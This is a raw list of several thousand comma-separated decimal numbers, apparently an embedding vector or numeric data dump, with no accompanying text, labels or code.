0.0158024150878191, -0.0036071520298719406, -0.008809810504317284, -0.04843941703438759, -0.02211175113916397, 0.015075533650815487, 0.008693508803844452, 0.0042849695309996605, 0.001381075824610889, 0.021137729287147522, -0.032855067402124405, 0.009129637852311134, 0.005022754892706871, 0.010241767391562462, -0.010888692922890186, -0.020672524347901344, -0.008555401116609573, 0.00873712170869112, -0.013723532669246197, 0.025833386927843094, -0.012684090994298458, 0.002162473974749446, -0.0023823557421565056, -0.026167752221226692, 0.012589597143232822, 0.016296695917844772, 0.019567664712667465, -0.019509512931108475, -0.0393388569355011, 0.011942671611905098, 0.004964604042470455, -0.019582202658057213, 0.030209217220544815, 0.015322673134505749, 0.012625941075384617, 0.00944946613162756, 0.01554073765873909, 0.029177045449614525, 0.002535001141950488, -0.011521080508828163, -0.014174199663102627, 0.002395076211541891, -0.02036723494529724, 0.04151950031518936, 0.0028148507699370384, 0.004593894351273775, 0.00045430127647705376, 0.008410025388002396, 0.03509386256337166, 0.003280055243521929, 0.004408539272844791, -0.036983758211135864, -0.020527148619294167, 0.006472884677350521, 0.009863789193332195, 0.011935402639210224, 0.046200621873140335, -0.01002370286732912, 0.010263574309647083, 0.016194932162761688, 0.012197080068290234, 0.03785601630806923, 0.007156153675168753, -0.0004477138863876462, 0.018491879105567932, -0.0022424310445785522, 0.01830288954079151, 0.0077340248972177505, -0.0025168289430439472, -0.008431831374764442, -0.013599962927401066, 0.005549744237214327, 0.012240692973136902, 0.012233424931764603, -0.010975918732583523, 0.01772138476371765, 0.010917767882347107, -0.005916819907724857, 0.005611529108136892, -0.009754756465554237, -0.00024895710521377623, 0.005473421886563301, 0.0064837876707315445, -0.013476393185555935, -0.01025630533695221, 0.001891710446216166, 0.019451363012194633, 0.004968238528817892, -0.013331016525626183, -0.030616270378232002, 0.025629859417676926, 0.02327476255595684, -0.006607357412576675, 0.024670375511050224, -0.03750711306929588, 0.01753239519894123, -0.014930156990885735, 0.017590545117855072, -0.023187536746263504, -0.0009476724662818015, -0.013469124212861061, 0.002934786258265376, 0.017881298437714577, -0.006127615459263325, 0.0006223927484825253, -0.009616648778319359, 0.026065990328788757, -0.014821124263107777, -0.00691264821216464, -0.02049807272851467, 0.008468175306916237, 0.0030601732432842255, -0.01008912269026041, 0.008671702817082405, 0.021457556635141373, 0.005887744482606649, 0.010488907806575298, -0.0143486512824893, -0.010975918732583523, 0.01850641705095768, -0.02366727963089943, -0.003750711213797331, 0.00017536028462927788, 0.010503445751965046, -0.019436825066804886, 0.01728525385260582, 0.019305987283587456, -0.006774540524929762, -0.0015037371776998043, -0.01754693128168583, 0.011390241794288158, -0.0038670124486088753, 0.0006292072357609868, 0.012567790225148201, -0.007748562376946211, -0.008141078986227512, 0.01953858882188797, 0.017764996737241745, 0.012545984238386154, -0.01263321004807949, 0.009943746030330658, -0.011768219992518425, -0.0098274452611804, 0.01709626615047455, -0.003383635776117444, -0.01830288954079151, 0.002046172972768545, -0.028014034032821655, -0.004990044981241226, -0.009434929117560387, -0.022329816594719887, -0.01447222102433443, 0.012916693463921547, 0.006967164110392332, -0.010627015493810177, -0.01709626615047455, 0.0060840025544166565, -0.001817205105908215, 0.019582202658057213, 0.027679666876792908, -0.01083054207265377, -0.02230074070394039, 0.0014628501376137137, 0.00035912514431402087, 0.01389798428863287, -0.006869035307317972, 0.014864737167954445, 0.04419442638754845, 0.03422160446643829, 0.010234499350190163, 0.015438973903656006, 0.026414893567562103, 0.005607894621789455, -0.028551926836371422, -0.006618260871618986, 0.002302398905158043, 0.02876999042928219, -0.004426711704581976, 0.030470894649624825, -0.010648821480572224, -0.01080146711319685, 0.023565515875816345, -0.0021170438267290592, -0.014857468195259571, 0.00472473306581378, -0.0038670124486088753, 0.014406802132725716, 0.012553252279758453, 0.007486884947866201, -0.013832565397024155, 0.0022115386091172695, 0.028915366157889366, 0.05253903195261955, 0.015642501413822174, -0.005157228093594313, -0.001199355348944664, 0.013650844804942608, -0.00024282402591779828, -0.00481922784820199, -0.0070289489813148975, 0.007145250216126442, 0.031953733414411545, 0.013178370893001556, -0.012466026470065117, -0.0025749795604497194, 0.009427660144865513, -0.01125213410705328, 0.014392264187335968, 0.028392011299729347, 0.03776878863573074, 0.006836325395852327, 0.024801215156912804, 0.014028823003172874, 0.008606282994151115, 0.028072183951735497, 0.0052335504442453384, -0.03765248879790306, -0.006345679983496666, -0.009762025438249111, -0.01985841616988182, 0.00217701168730855, -0.012902156449854374, -0.006592819932848215, -0.000753231521230191, 0.009689337573945522, 0.012204349040985107, -0.03018014132976532, 0.014043360948562622, 0.004506668541580439, -0.005698754917830229, 0.022286202758550644, -0.00037956872256472707, 0.0010721510043367743, -0.0013056618627160788, -0.0016763716703280807, -0.022460654377937317, -0.0023587322793900967, 0.0015182748902589083, -0.002091603120788932, 0.0212685689330101, 0.026720182970166206, 0.01702357642352581, -0.018855320289731026, 0.005760540254414082, 0.010714241303503513, 0.0270836241543293, 0.011746414005756378, 0.00970387551933527, -0.032535240054130554, -0.008671702817082405, 0.00010477322939550504, 0.0141814686357975, -0.006956261117011309, -0.022024525329470634, -0.020483534783124924, -0.008388218469917774, -0.002731259213760495, -0.025106504559516907, -0.018201125785708427, 0.01972757838666439, -0.01972757838666439, 0.012575059197843075, -0.0011666456703096628, 0.017706846818327904, 0.006970798596739769, -0.017590545117855072, -0.02927880734205246, 0.0008972450159490108, 0.0036634854041039944, 0.013316478580236435, 0.008911573328077793, -0.01173187606036663, -0.008955186232924461, -0.005382561590522528, 0.004223184660077095, -0.012197080068290234, -0.011223058216273785, -0.01682005077600479, -0.013367360457777977, -0.023245686665177345, 0.0023005816619843245, 0.006018583197146654, 0.0014355919556692243, -0.0024005279410630465, -0.005844131577759981, 0.019305987283587456, 0.02552809752523899, -0.005978604778647423, 0.02057076059281826, 0.011710069142282009, -0.0003548092790879309, 0.006581916939467192, -0.022547880187630653, -0.0025931515265256166, 0.022998547181487083, 0.02939510904252529, -0.004052367527037859, -0.005549744237214327, 0.007981164380908012, -0.004924625623971224, 0.003925162833184004, -0.011550155468285084, 0.008359143510460854, -0.017459705471992493, 0.002987485146149993, -0.0006787261227145791, 0.02308577299118042, -0.019262373447418213, -0.01644207164645195, 0.012662285007536411, -0.027185387909412384, 0.002291495678946376, -0.006745465099811554, 0.006865400820970535, 0.00535348616540432, 0.02599330060184002, -0.009616648778319359, -0.010946843773126602, 0.0067345621064305305, -0.009907402098178864, -0.004324947949498892, -0.020876051858067513, -0.007116175256669521, -0.018230201676487923, 0.024902978911995888, -0.015293598175048828, 0.006120346486568451, -0.008911573328077793, 0.004702926613390446, 0.014050629921257496, 0.018739018589258194, 0.005237184930592775, 0.017576007172465324, 0.00018819430260919034, -0.008788003586232662, -0.025106504559516907, 0.02006194368004799, 0.022329816594719887, 0.0004236359382048249, -0.007225207518786192, -0.0026185924652963877, 0.005404368042945862, -0.002087968634441495, -0.013418242335319519, -0.0003098334709648043, 0.0047101955860853195, -0.001902613672427833, 0.0001931916194735095, -0.006770906038582325, 0.015686113387346268, -0.020003793761134148, -0.0066546048037707806, -0.0048592062667012215, -0.022068139165639877, -0.000031034454877953976, 0.012982113286852837, 0.023260224610567093, 0.00001227323264174629, -0.020919665694236755, -0.0031928292009979486, -0.0012375166406854987, -0.028929904103279114, 0.0007695863605476916, -0.005778712220489979, -0.011448391713202, -0.0002082971332129091, 0.011790026910603046, -0.008562670089304447, 0.004426711704581976, -0.008032046258449554, 0.021777385845780373, -0.01292396243661642, 0.016427533701062202, 0.027999496087431908, -0.017198028042912483, 0.0002500928530935198, -0.026603883132338524, 0.011397509835660458, -0.020483534783124924, 0.017256179824471474, 0.016427533701062202, -0.020425384864211082, -0.0009004251332953572, -0.0046593137085437775, 0.006698217708617449, -0.00581869063898921, -0.019247835502028465, -0.006294798571616411, -0.0046556792221963406, 0.0050336578860878944, 0.019102459773421288, 0.012647747062146664, -0.003772517666220665, 0.00825737975537777, 0.009958283975720406, 0.0018335599452257156, 0.00935497134923935, 0.02295493520796299, 0.0032164528965950012, 0.014784780330955982, 0.009049681015312672, 0.004637507256120443, -0.0007577745127491653, -0.0026858290657401085, 0.001195720979012549, 0.015308135189116001, -0.0040341950953006744, -0.0012702263193205, -0.014246887527406216, 0.005687851924449205, -0.01527906022965908, 0.00453210948035121, -0.010561595670878887, -0.00864262692630291, 0.02243157848715782, -0.004622969776391983, 0.0002598603314254433, -0.028537388890981674, -0.0021352160256356, -0.01985841616988182, -0.01593325473368168, -0.007356046233326197, -0.00195712991990149, -0.011164908297359943, 0.019189685583114624, 0.036838382482528687, -0.002131581539288163, -0.0014819307252764702, 0.019116997718811035, -0.024728527292609215, -0.010554326698184013, 0.004553915932774544, 0.0018217480974271894, -0.004281335044652224, 0.02496112883090973, -0.022533342242240906, 0.014675748534500599, -0.017503319308161736, -0.011535617522895336, -0.02295493520796299, 0.01189905870705843, 0.0065383040346205235, -0.006999874021857977, -0.02567347325384617, 0.01199355348944664, 0.00010085487883770838, -0.00267674308270216, 0.0036362274549901485, 0.017387017607688904, 0.024336010217666626, -0.0029275172855705023, 0.011390241794288158, -0.015206372365355492, -0.019305987283587456, -0.02849377505481243, -0.011913596652448177, 0.026211366057395935, 0.011288478039205074, -0.008460907265543938, 0.004957335535436869, -0.005408002063632011, 0.0167618989944458, -0.027243537828326225, 0.015424436889588833, -0.007421465590596199, 0.009871058166027069, -0.00717432564124465, 0.012567790225148201, 0.015322673134505749, -0.013163833878934383, 0.03215726092457771, 0.004441249184310436, 0.01070697233080864, -0.0032673347741365433, -0.012138930149376392, -0.0348031111061573, -0.006650970783084631, -0.013309209607541561, -0.01025630533695221, 0.0008372772135771811, 0.00019716675160452724, 0.007893938571214676, 0.033233046531677246, -0.0087080467492342, 0.0174160934984684, -0.0031165066175162792, 0.0029002593364566565, -0.013912522234022617, 0.008911573328077793, 0.015046457760035992, 0.007944820448756218, 0.006705486681312323, -0.0018162964843213558, 0.024219708517193794, -0.013410973362624645, -0.011433854699134827, 0.00899879913777113, 0.0025259151589125395, -0.00990013312548399, -0.007515960372984409, -0.0021751944441348314, -0.02387080527842045, 0.007014411501586437, 0.019189685583114624, 0.008511788211762905, -0.00011454070772742853, 0.02830478549003601, -0.01747424341738224, 0.010656090453267097, -0.013258327730000019, -0.005644239019602537, -0.0075086914002895355, 0.006745465099811554, -0.0025713450741022825, -0.023376526311039925, 0.0017844954272732139, -0.0006214841268956661, 0.014166930690407753, 0.002191549399867654, -0.021646546199917793, -0.016558373346924782, 0.006403830833733082, 0.0036325929686427116, -0.003434517653658986, 0.010983187705278397, 0.008112003095448017, -0.0049355290830135345, -0.00996555294841528, 0.0038379370234906673, -0.022329816594719887, -0.005182669032365084, 0.001852640532888472, 0.011622843332588673, 0.022780483588576317, 0.0024713987950235605, 0.03474495932459831, -0.011811832897365093, 0.00806112214922905, 0.017823146656155586, -0.009195057675242424, -0.003120141103863716, 0.019683964550495148, -0.013469124212861061, 0.010503445751965046, -0.021951837465167046, -0.003665302647277713, -0.014450415037572384, 0.010241767391562462, -0.018331965431571007, -0.007250648457556963, 0.024030718952417374, 0.016005942597985268, -0.005237184930592775, 0.017009040340781212, 0.01189905870705843, -0.011499273590743542, -0.010110928677022457, -0.005978604778647423, 0.004125055391341448, -0.012858542613685131, -0.003234625095501542, -0.035500917583703995, -0.006898110266774893, 0.004052367527037859, 0.0196548905223608, 0.0042595285922288895, 0.01895708404481411, 0.003587162820622325, 0.0012738608056679368, -0.000026888956199400127, -0.009841982275247574, 0.0012938500149175525, -0.029627710580825806, -0.01556981261819601, 0.018099362030625343, 0.002262420253828168, -0.0034272486809641123, 0.012720435857772827, -0.014690285548567772, -0.007072562351822853, 0.0002748522674664855, -0.015482586808502674, 0.013527274131774902, 0.0029674959369003773, 0.012029897421598434, 0.0016854576533660293, -0.000514269049745053, -0.005411636549979448, -0.0040341950953006744, 0.01985841616988182, 0.012487833388149738, -0.010358069092035294, 0.01363630685955286, 0.008300992660224438, -0.012684090994298458, 0.0066327983513474464, 0.0001983024994842708, -0.014573984779417515, -0.014174199663102627, -0.0015128232771530747, 0.0038161305710673332, -0.0042558941058814526, -0.009892864152789116, -0.019436825066804886, -0.013360091485083103, -0.029773088172078133, -0.002287861192598939, 0.01966942846775055, 0.014959231950342655, 0.008039315231144428, -0.014748436398804188, 0.021006891503930092, 0.0015718823997303843, 0.003961507230997086, 0.014944694936275482, 0.01325105968862772, -0.007225207518786192, 0.0024695817846804857, -0.006022217683494091, 0.003334571374580264, 0.022620568051934242, 0.006193034816533327, 0.022998547181487083, 0.009558498859405518, 0.010110928677022457, -0.00028666408616118133, -0.000023723045160295442, -0.0044848620891571045, -0.024481385946273804, 0.0050845397636294365, -0.005106346216052771, -0.012451489455997944, -0.004186840262264013, 0.01779407262802124, -0.009652993641793728, -0.0029893023893237114, 0.005662410985678434, 0.010765123181045055, 0.01044529490172863, 0.011179445311427116, 0.01473389845341444, 0.004920991137623787, 0.02360912784934044, 0.009594842791557312, 0.011630112305283546, -0.008548133075237274, 0.005040926858782768, -0.020934201776981354, -0.008526326157152653, -0.013861640356481075, -0.00832279957830906, -0.011615574359893799, 0.009754756465554237, 0.007290626876056194, 0.00806112214922905, 0.004488496575504541, -0.006774540524929762, 0.00806112214922905, 0.0018371943151578307, -0.008795272558927536, 0.005724195856601, 0.02567347325384617, -0.00944946613162756, 0.01556981261819601, 0.01063428446650505, 0.006287529598921537, -0.01972757838666439, 0.006770906038582325, -0.01208804827183485, 0.0010585219133645296, -0.02520826831459999, 0.00635294895619154, -0.008002971298992634, -0.02340560220181942, 0.004942797590047121, -0.010517982766032219, 0.012218886986374855, -0.00944946613162756, 0.027228999882936478, -0.008359143510460854, -0.012945769354701042, 0.01315656490623951, 0.006094906013458967, -0.0174160934984684, -0.03992035984992981, -0.0035108402371406555, 0.014617597684264183, -0.013527274131774902, -0.0024114311672747135, -0.0031437647994607687, -0.00010199063399340957, 0.01070697233080864, -0.0083809494972229, -0.02430693432688713, 0.007203401066362858, 0.015642501413822174, -0.00012743150000460446, -0.005720561370253563, 0.009369509294629097, -0.006527400575578213, -0.008780734613537788, 0.00001730603980831802, 0.013440048322081566, -0.01798306219279766, -0.002484119264408946, -0.0037434424739331007, -0.003390904748812318, -0.0041359588503837585, -0.007326970808207989, -0.0022478827740997076, -0.02528095617890358, -0.016093168407678604, -0.0033254853915423155, -0.00960938073694706, -0.00232057087123394, 0.018361039459705353, -0.006411099340766668, -0.02102142758667469, -0.009711143560707569, 0.006302067078649998, -0.0062584541738033295, -0.008780734613537788, 0.013032995164394379, -0.006610991898924112, 0.01447222102433443, -0.025818848982453346, -0.015075533650815487, 0.0044848620891571045, -0.010503445751965046, 0.01205897331237793, -0.0035544531419873238, 0.002502291463315487, 0.011593768373131752, 0.006690949201583862, 0.0017408824060112238, -0.0053389486856758595, -0.0007359680603258312, 0.03410530462861061, 0.012458758428692818, 0.017328867688775063, 0.014057897962629795, 0.009776563383638859, -0.014232350513339043, -0.00498277647420764, -0.006251185666769743, 0.005113615188747644, 0.007610454689711332, -0.002106140600517392, 0.007094368804246187, 0.021254030987620354, 0.015700651332736015, -0.009500348009169102, -0.009674799628555775, 0.008657164871692657, 0.00580415315926075, 0.028333861380815506, 0.0012893070233985782, 0.029496872797608376, -0.009434929117560387, -0.019509512931108475, -0.0039106253534555435, 0.005782346706837416, 0.005389830097556114, -0.009951015003025532, -0.014246887527406216, -0.005280797835439444, 0.013556350022554398, 0.00268401182256639, 0.013505468145012856, -0.00899153109639883, -0.026153216138482094, 0.009740219451487064, 0.00754503533244133, -0.004201378207653761, -0.010547058656811714, -0.014784780330955982, -0.007417831104248762, 0.008141078986227512, 0.001895344932563603, 0.008460907265543938, 0.010190886445343494, -0.0022260763216763735, 0.002431420376524329, 0.013018457219004631, 0.0029674959369003773, -0.002395076211541891, -0.0021860976703464985, -0.01792491041123867, 0.014123317785561085, -0.011193983256816864, 0.010728778317570686, 0.016224006190896034, 0.006211206782609224, 0.008315530605614185, -0.014021554030478, 0.007959358394145966, -0.013272865675389767, 0.020018331706523895, -0.008032046258449554, 0.020265471190214157, -0.007087099831551313, -0.014886544086039066, 0.012138930149376392, 0.004826496820896864, 0.005549744237214327, 0.008591745980083942, 0.016151318326592445, -0.011106757447123528, -0.028028570115566254, 0.010416219010949135, -0.0032746035140007734, 0.0010666993912309408, -0.00889703631401062, 0.03300044313073158, 0.002298764418810606, -0.003590797306969762, -0.009231401607394218, -0.001630941522307694, 0.0033036787062883377, 0.0023641837760806084, -0.005749636795371771, -0.0048846472054719925, 0.00802477728575468, -0.0011502908309921622, -0.00436856085434556, 0.004888281691819429, -0.021966375410556793, 0.009267745539546013, -0.019524050876498222, -0.0016409361269325018, 0.014668479561805725, 0.007792175281792879, -0.0017754093278199434, -0.007595917209982872, -0.008918842300772667, 0.004215915687382221, 0.011557424440979958, -0.01921876147389412, 0.0010267208563163877, 0.009413122199475765, -0.004692023620009422, 0.0011475649662315845, 0.009493079036474228, -0.013752607628703117, -0.007515960372984409, -0.009667530655860901, 0.007726755924522877, -0.012189812026917934, -0.023696353659033775, -0.0011339359916746616, -0.0016736459219828248, -0.0034890337847173214, 0.01408697385340929, -0.014748436398804188, -0.007036217954009771, -0.023565515875816345, -0.018550029024481773, 0.012066241353750229, -0.012749510817229748, -0.020716138184070587, -0.019625814631581306, 0.006389292888343334, -0.012785854749381542, -0.005397099070250988, 0.030092915520071983, 0.023434676229953766, -0.023420138284564018, -0.0031383130699396133, 0.01857910491526127, 0.020541686564683914, -0.005636970046907663, 0.012487833388149738, 0.022213514894247055, 0.005248088389635086, 0.00935497134923935, -0.005644239019602537, -0.004608431831002235, -0.010038240812718868, 0.01118671428412199, -0.024728527292609215, 0.011310284025967121, 0.010241767391562462, 0.004394001793116331, 0.003398173488676548, 0.005211743991822004, -0.008664433844387531, 0.024132482707500458, -0.0012020810972899199, -0.01916060969233513, -0.013890715315937996, -0.017837684601545334, 0.023318376392126083, -0.0076322611421346664, 0.003965141251683235, -0.021820997819304466, -0.003994216676801443, -0.0001415148435626179, -0.0025786140467971563, -0.018797168508172035, 0.004041464067995548, 0.01092503685504198, -0.02786865644156933, 0.005026389379054308, -0.009711143560707569, 0.011106757447123528, 0.016005942597985268, 0.020163707435131073, -0.003409076714888215, -0.0025677108205854893, -0.01498830784112215, -0.002573162317276001, -0.009856520220637321, -0.026647495105862617, 0.039629608392715454, -0.019771190360188484, -0.004041464067995548, -0.009841982275247574, 0.04099614545702934, -0.027737818658351898, 0.012291574850678444, -0.00249138823710382, 0.005051830317825079, 0.013745339587330818, 0.009478542022407055, 0.019116997718811035, -0.014261425472795963, -0.0015228178817778826, -0.01196447852998972, -0.008170153945684433, -0.018099362030625343, 0.009914671070873737, 0.006044024135917425, 0.01061247754842043, -0.009078756906092167, 0.01182637084275484, -0.010779660195112228, 0.018273813650012016, 0.02347829006612301, 0.012218886986374855, -0.013323747552931309, 0.0011439305962994695, -0.02657480724155903, 0.015627963468432426, -0.005564281716942787, 0.009456735104322433, -0.006574647966772318, -0.017517857253551483, 0.00847544427961111, 0.010823273099958897, -0.001028538099490106, 0.00844636932015419, -0.000033873839129228145, -0.019320525228977203, -0.00007626582373632118, -0.013679919764399529, 0.004266797564923763, 0.013490930199623108, 0.004506668541580439, 0.0052335504442453384, 0.013810758478939533, -0.0019553126767277718, -0.005469787400215864, -0.0038815499283373356, 0.010772391222417355, -0.005418905522674322, 0.01689273864030838, -0.019073383882641792, -0.0017108985921368003, 0.005953163839876652, -0.017895836383104324, 0.0019135168986395001, -0.027170849964022636, -0.005825959611684084, -0.02154478244483471, -0.019829342141747475, -0.0225624181330204, -0.03718728572130203, -0.00553157227113843, -0.017125340178608894, 0.033116746693849564, 0.0012929413933306932, -0.0044848620891571045, -0.012749510817229748, 0.009871058166027069, 0.0316048301756382, -0.01786676049232483, 0.0043540233746171, -0.003650764934718609, -0.009660262614488602, 0.00008262604387709871, 0.034657735377550125, 0.006741830613464117, 0.000019790499209193513, 0.008431831374764442, -0.013178370893001556, 0.006865400820970535, -0.0016018662136048079, -0.0070834653452038765, -0.003790689865127206, -0.020032867789268494, -0.014886544086039066, -0.010314456187188625, 0.020018331706523895, -0.004564818926155567, -0.00000996623384708073, 0.006272992119193077, -0.005847766064107418, -0.002609506482258439, 0.008671702817082405, 0.007981164380908012, -0.029322421178221703, -0.010525251738727093, -0.008838885463774204, -0.017357943579554558, -0.02753429114818573, -0.002540452638641, -0.00899153109639883, 0.000753231521230191, 0.0021970008965581656, -0.005219012964516878, 0.0013438231544569135, 0.012080779299139977, 0.004244991112500429, -0.011760951019823551, -0.010299918241798878, -0.02449592389166355, 0.017299791797995567, -0.00861355196684599, -0.02171923592686653, -0.006923551205545664, -0.03378547728061676, 0.006680045742541552, -0.02785411849617958, -0.007559573277831078, -0.001973484642803669, -0.0000372243084711954, -0.018201125785708427, 0.027563367038965225, 0.002445958089083433, -0.002980216406285763, 0.00591318542137742, -0.010408950969576836, -0.003679840359836817, 0.0012575059663504362, 0.0008686240180395544, 0.0000053806306823389605, 0.02347829006612301, -0.005807787179946899, 0.02218443900346756, 0.016267620027065277, -0.0031601195223629475, 0.024655837565660477, -0.017067190259695053, 0.01985841616988182, -0.009660262614488602, -0.008693508803844452, 0.0038670124486088753, -0.017503319308161736, -0.009340434335172176, 0.004670217167586088, -0.008751659654080868, -0.024990204721689224, -0.015046457760035992, 0.01987295411527157, 0.021065041422843933, -0.0009967369260266423, -0.009173250757157803, -0.0020007428247481585, -0.02430693432688713, 0.00509180873632431, 0.0003593522997107357, -0.0014319575857371092, 0.0033254853915423155, -0.02605145238339901, 0.0009967369260266423, -0.01135389693081379, -0.015468049794435501, 0.006730927620083094, 0.007388755679130554, -0.004524840507656336, 0.0033472918439656496, -0.012553252279758453, 0.005753271281719208, 0.030529044568538666, 0.020992353558540344, 0.017837684601545334, 0.010081853717565536, -0.030063841491937637, -0.029802164062857628, 0.014457683078944683, -0.00861355196684599, -0.01470482349395752, 0.0014837479684501886, -0.020672524347901344, 0.006665508262813091, -0.0038633779622614384, -0.00754503533244133, -0.009602111764252186, -0.021006891503930092, -0.007690411992371082, -0.00992920808494091, 0.002640398917719722, -0.010561595670878887, 0.0130620701238513, 0.014057897962629795, -0.020396308973431587, 0.013054801151156425, 0.018840782344341278, -0.011019531637430191, 0.02275140769779682, 0.02083243802189827, -0.002898442093282938, -0.004960970021784306, -0.030325518921017647, -0.019843880087137222, 0.0322444885969162, 0.013331016525626183, 0.00944946613162756, 0.005349851679056883, -0.030209217220544815, -0.020018331706523895, 0.009049681015312672, -0.015497124753892422, -0.02629859186708927, 0.02353643998503685, 0.011332090944051743, 0.04939890280365944, -0.015395360998809338, 0.0028584636747837067, 0.012982113286852837, 0.018477341160178185, -0.0043540233746171, -0.019509512931108475, -0.012051704339683056, -0.023289300501346588, -0.003779786638915539, 0.0014001565286889672, 0.00718886312097311, -0.01604955457150936, 0.01524998527020216, 0.0016218555392697453, 0.0006787261227145791, -0.003979679197072983, -0.0023369258269667625, 0.0026385816745460033, 0.011070413514971733, 0.00045907142339274287, -0.003031098050996661, -0.02552809752523899, -0.04300234094262123, -0.02404525689780712, -0.010234499350190163, -0.021137729287147522, 0.0005896830698475242, -0.016412995755672455, 0.0141814686357975, 0.011971746571362019, 0.01373080164194107, -0.011615574359893799, 0.0015518930740654469, 0.0009385864250361919, -0.010038240812718868, -0.009587573818862438, -0.015700651332736015, -0.0010548875434324145, 0.0002930243208538741, -0.02522280625998974, 0.020352696999907494, -0.00664006732404232, 0.008308261632919312, -0.009107831865549088, -0.0035544531419873238, 0.01163738127797842, 0.014065166935324669, -0.008817078545689583, 0.015584350563585758, -0.024786677211523056, -0.009136906825006008, -0.007341508287936449, -0.01270589791238308, -0.017198028042912483, -0.015598888508975506, 0.03785601630806923, 0.000006502186806756072, 0.008468175306916237, -0.045037612318992615, -0.008744390681385994, 0.009493079036474228, -0.0225624181330204, -0.009987358935177326, -0.00282030226662755, -0.002976581919938326, -0.01382529642432928, -0.02030908316373825, -0.01565703935921192, -0.0017408824060112238, 0.002551355864852667, 0.01237880066037178, 0.021893687546253204, 0.020410846918821335, -0.012356994673609734, 0.0034163454547524452, 0.013461855240166187, -0.0029856679029762745, 0.025688011199235916, 0.01966942846775055, 0.020076481625437737, -0.01664559915661812, -0.02365274168550968, -0.00889703631401062, 0.009195057675242424, 0.00037843294558115304, -0.0031383130699396133, 0.004037829581648111, -0.02629859186708927, -0.01664559915661812, 0.0017963071586564183, -0.017764996737241745, -0.009136906825006008, 0.010147273540496826, -0.015104608610272408, -0.024219708517193794, 0.008410025388002396, 0.006251185666769743, 0.026065990328788757, 0.004699292127043009, -0.024074332788586617, -0.010576133616268635, 0.022940397262573242, -0.0035926143173128366, -0.020657986402511597, -0.006218475755304098, 0.025615323334932327, -0.01498830784112215, 0.011615574359893799, -0.009667530655860901, -0.0026367646642029285, -0.016718287020921707, 0.022722331807017326, -0.019756654277443886, -0.002940237754955888, -0.010001896880567074, 0.0046847546473145485, 0.013098414056003094, 0.007207035087049007, 0.006211206782609224, 0.0028221195098012686, -0.01261140312999487, -0.008082928135991096, 0.0073342397809028625, -0.011651919223368168, 0.014450415037572384, 0.020977815613150597, -0.011303015984594822, -0.01798306219279766, -0.003765248926356435, -0.02360912784934044, 0.020280009135603905, -0.009078756906092167, 0.000672820198815316, -0.013483661226928234, -0.007247013971209526, -0.005557013209909201, 0.007952089421451092, 0.003594431560486555, 0.017183491960167885, -0.01363630685955286, -0.01064155250787735, 0.007167056668549776, -0.00796662736684084, 0.002823936752974987, -0.009783832356333733, -0.0225624181330204, 0.0004579356755129993, -0.02539725787937641, 0.0031165066175162792, -0.00980563834309578, 0.005317142233252525, 0.005186303053051233, -0.020643450319767, -0.02043992280960083, 0.019683964550495148, 0.035878896713256836, -0.00782851967960596, 0.005611529108136892, -0.00925320852547884, 0.028072183951735497, -0.004372195340692997, -0.0001331102685071528, 0.0036380444653332233, 0.006287529598921537, 0.01593325473368168, -0.0029529582243412733, 0.021951837465167046, -0.015264522284269333, -0.0030220120679587126, 0.002051624469459057, 0.011012262664735317, -0.009958283975720406, 0.034134380519390106, 0.0014910167083144188, -0.02154478244483471, -0.007236110512167215, 0.013287403620779514, 0.0003012017405126244, 0.004248625598847866, 0.02360912784934044, 0.013469124212861061, -0.003280055243521929, 0.013490930199623108, -0.020294547080993652, 0.009914671070873737, -0.010241767391562462, 0.005851400550454855, 0.008984262123703957, 0.012218886986374855, 0.009951015003025532, 0.006236647721379995, 0.001506463042460382, -0.00996555294841528, -0.016078630462288857, -0.004619335290044546, -0.004361292347311974, 0.0005079088150523603, 0.00970387551933527, -0.014014285057783127, -0.0025277321692556143, 0.00349085102789104, 0.019058845937252045, 0.005295335780829191, -0.02526642009615898, -0.00690174475312233, 0.014762974344193935, 0.0035253779496997595, -0.012596865184605122, -0.020934201776981354, 0.014683016575872898, 0.020992353558540344, -0.0011802746448665857, -0.010481638833880424, 0.0024223343934863806, 0.012226155959069729, 0.00762499263510108, 0.0033999907318502665, -0.011048606596887112, 0.004975507501512766, -0.014275963418185711, -0.015715189278125763, -0.002640398917719722, -0.01382529642432928, 0.0017826781840994954, -0.0143486512824893, -0.01875355653464794, 0.0028366572223603725, -0.015424436889588833, -0.00063511315966025, 0.01856456696987152, 0.01689273864030838, -0.0055352067574858665, 0.014973769895732403, 0.007843056693673134, -0.008133810013532639, -0.0018135706195607781, 0.011303015984594822, 0.007225207518786192, -0.004837399814277887, -0.010808736085891724, -0.013134757988154888, 0.00381976505741477, -0.009769294410943985, -0.032855067402124405, -0.005215378478169441, -0.0048592062667012215, 0.011746414005756378, 0.0036580339074134827, 0.017517857253551483, -0.00368347461335361, 0.001902613672427833, 0.007813981734216213, -0.02081790193915367, -0.0038706467021256685, 0.00039615071727894247, 0.004452152643352747, -0.00018569563690107316, -0.019393213093280792, -0.003750711213797331, 0.01092503685504198, -0.022620568051934242, 0.0057096583768725395, 0.016427533701062202, -0.011259403079748154, -0.020992353558540344, -0.00037956872256472707, 0.01850641705095768, -0.011593768373131752, -0.0017336136661469936, 0.014065166935324669, 0.025906074792146683, 0.0010739682475104928, 0.0019862051121890545, 0.03829214349389076, -0.014973769895732403, -0.00909329392015934, -0.022475192323327065, 0.012480564415454865, -0.005229916423559189, 0.0010158176301047206, 0.013309209607541561, 0.007988433353602886, 0.0018153878627344966, -0.024844827130436897, -0.016747361049056053, 0.025935150682926178, 0.01180456392467022, 0.02862461470067501, -0.007566841784864664, 0.0008022960391826928, 0.00336182932369411, 0.0038888189010322094, 0.006211206782609224, 0.03049997054040432, -0.01677643693983555, -0.007959358394145966, -0.000835005717817694, -0.0316048301756382, -0.004477593116462231, -0.00024327832215931267, 0.005360755138099194, 0.020657986402511597, 0.026996398344635963, -0.0027294419705867767, -0.00899153109639883, 0.013011188246309757, 0.0034853992983698845, -0.008126541040837765, -0.010525251738727093, 0.018666330724954605, 0.015947790816426277, 0.006985336076468229, 0.006948992144316435, -0.016282157972455025, -0.01247329544275999, 0.0077340248972177505, -0.0031782917212694883, -0.009325896389782429, 0.030907023698091507, 0.03361102566123009, -0.030005689710378647, 0.0037107327952980995, -0.01121578924357891, -0.003779786638915539, 0.018462803214788437, 0.012487833388149738, 0.016936350613832474, -0.004782883916050196, -0.0002630404196679592, -0.008867960423231125, 0.0128948874771595, 0.016035016626119614, 0.008097466081380844, 0.012604134157299995, 0.007261551450937986, 0.011550155468285084, -0.0013120220974087715, -0.005698754917830229, -0.014668479561805725, -0.012582328170537949, -0.0010003714123740792, -0.006287529598921537, -0.002420517150312662, 0.013323747552931309, -0.01650022156536579, 0.010510713793337345, -0.008715315721929073, 